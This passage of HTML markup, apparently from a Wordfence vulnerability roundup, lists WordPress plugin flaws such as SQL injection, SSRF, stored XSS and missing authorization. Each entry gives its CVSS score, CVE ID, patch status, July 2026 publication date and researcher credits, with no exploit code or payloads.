					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d637d7b-7a47-40db-a931-ec7ca723dfab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df5fc86f-e4ba-424b-bece-79abd763cf74" target="_blank" rel="noopener">WP CTA &lt;= 2.1.2 &#8211; Authenticated (Administrator+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6089" target="_blank" rel="noopener noreferrer">							CVE-2026-6089						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-sticky-sidebar" target="_blank" rel="noopener">WP CTA – Call Now Button, Sticky Button &amp; Call to Action Builder</a> <span class="wfvr-software-slug">[easy-sticky-sidebar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-truong" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2440c0aacc02af8dcc176fda663ee4a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2440c0aacc02af8dcc176fda663ee4a8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-truong" target="_blank" rel="noopener">Nguyen Quang Truong</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/68bf83ddc4a547f6935e2ad92922ee09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68bf83ddc4a547f6935e2ad92922ee09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener">Chu Thao Mai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df5fc86f-e4ba-424b-bece-79abd763cf74" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/db14e2b8-3217-4f81-a44e-e50734ef304c" target="_blank" rel="noopener">WP Photo Album Plus &lt;= 9.2.04.002 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;table&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15344" target="_blank" rel="noopener noreferrer">							CVE-2026-15344						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-photo-album-plus" target="_blank" rel="noopener">WP Photo Album Plus</a> <span class="wfvr-software-slug">[wp-photo-album-plus]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/db14e2b8-3217-4f81-a44e-e50734ef304c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cec0d64e-7b31-4484-8237-2ab4d730ab86" target="_blank" rel="noopener">WP-Lister Lite for eBay &lt;= 3.8.8 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;orderby&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11973" target="_blank" rel="noopener noreferrer">							CVE-2026-11973						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-lister-for-ebay" target="_blank" rel="noopener">WP-Lister Lite for eBay</a> <span class="wfvr-software-slug">[wp-lister-for-ebay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya" target="_blank" rel="noopener">Yousof Nahya</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hamza-nour" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hamza-nour" target="_blank" rel="noopener">Hamza Nour</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/221461b70f6b0e2c571141647c2528f4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="221461b70f6b0e2c571141647c2528f4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya-2" target="_blank" rel="noopener">Yousof Nahya (whoami03)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cec0d64e-7b31-4484-8237-2ab4d730ab86" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7130f325-a0c4-479d-ac85-94542bdb5a79" target="_blank" rel="noopener">WPvivid &lt;= 0.9.131 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;export_data&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17555" target="_blank" rel="noopener noreferrer">							CVE-2026-17555						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore" target="_blank" rel="noopener">WPvivid — Backup, Migration &amp; Staging</a> <span class="wfvr-software-slug">[wpvivid-backuprestore]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7130f325-a0c4-479d-ac85-94542bdb5a79" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bbd5e03-2b66-463c-96aa-fc6b44b4f03c" target="_blank" rel="noopener">Checkout Field Editor for WooCommerce – Checkout Manager &lt;= 3.0.5 &#8211; Authenticated (Shop manager+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66475" target="_blank" rel="noopener noreferrer">							CVE-2026-66475						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkout-field-editor-and-manager-for-woocommerce" target="_blank" rel="noopener">Checkout Field Editor for WooCommerce – Checkout Manager</a> <span class="wfvr-software-slug">[checkout-field-editor-and-manager-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bbd5e03-2b66-463c-96aa-fc6b44b4f03c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c2ad4325-be1f-48c1-b21f-adf9ce3fa2cb" target="_blank" rel="noopener">SMS Alert &lt;= 3.9.7 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;checkout_payment_plans&#8217; and &#8216;order_status&#8217; Settings</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15673" target="_blank" rel="noopener noreferrer">							CVE-2026-15673						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c2ad4325-be1f-48c1-b21f-adf9ce3fa2cb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af913bb1-eff6-47cd-9471-f74bafda1e52" target="_blank" rel="noopener">Advanced Form Integration &lt;= 2.6.0 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary MailUp OAuth Token Overwrite via auth_redirect() Function</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16587" target="_blank" rel="noopener noreferrer">							CVE-2026-16587						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-form-integration" target="_blank" rel="noopener">Advanced Form Integration — Connect Forms to 200+ Apps</a> <span class="wfvr-software-slug">[advanced-form-integration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af913bb1-eff6-47cd-9471-f74bafda1e52" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a32f4dda-f22e-488e-b57a-efc8de8da036" target="_blank" rel="noopener">AnsPress – Question and answer  4.4.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65554" target="_blank" rel="noopener noreferrer">							CVE-2026-65554						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/anspress-question-answer" target="_blank" rel="noopener">AnsPress – Question and answer</a> <span class="wfvr-software-slug">[anspress-question-answer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1fcd4731afa8285a12c991cc8c7bdb09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1fcd4731afa8285a12c991cc8c7bdb09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener">Taylsec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a32f4dda-f22e-488e-b57a-efc8de8da036" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a6921b3-a0a1-4392-ba8d-d3fb6892c639" target="_blank" rel="noopener">Colissimo shipping methods for WooCommerce &lt;= 2.10.0 &#8211; Authenticated (Customer+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66692" target="_blank" rel="noopener noreferrer">							CVE-2026-66692						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/colissimo-shipping-methods-for-woocommerce" target="_blank" rel="noopener">Colissimo shipping methods for WooCommerce</a> <span class="wfvr-software-slug">[colissimo-shipping-methods-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c4c7257eabfabcbfa54be7eb5b7dd68c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4c7257eabfabcbfa54be7eb5b7dd68c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener">TurboNexic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a6921b3-a0a1-4392-ba8d-d3fb6892c639" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a54b803-7e30-4964-88f0-d79276e67218" target="_blank" rel="noopener">Cookie Banner for GDPR / CCPA – WPLP Cookie Consent &lt;= 4.3.7 &#8211; Cross-Site Request Forgery via Bulk Action to Delete/Resolve Entries</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15136" target="_blank" rel="noopener noreferrer">							CVE-2026-15136						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a54b803-7e30-4964-88f0-d79276e67218" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fdfac5bc-89ac-4ed7-85e9-a4a1ff0bfbff" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy &lt;= 5.0.10 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66699" target="_blank" rel="noopener noreferrer">							CVE-2026-66699						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-lite" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy</a> <span class="wfvr-software-slug">[dokan-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fdfac5bc-89ac-4ed7-85e9-a4a1ff0bfbff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e8f0ef8-4916-4b62-a062-f169ba15448e" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.26 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14188" target="_blank" rel="noopener noreferrer">							CVE-2026-14188						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e8f0ef8-4916-4b62-a062-f169ba15448e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19544e08-fa14-4251-bcc2-e46ebccca075" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.26 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14226" target="_blank" rel="noopener noreferrer">							CVE-2026-14226						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
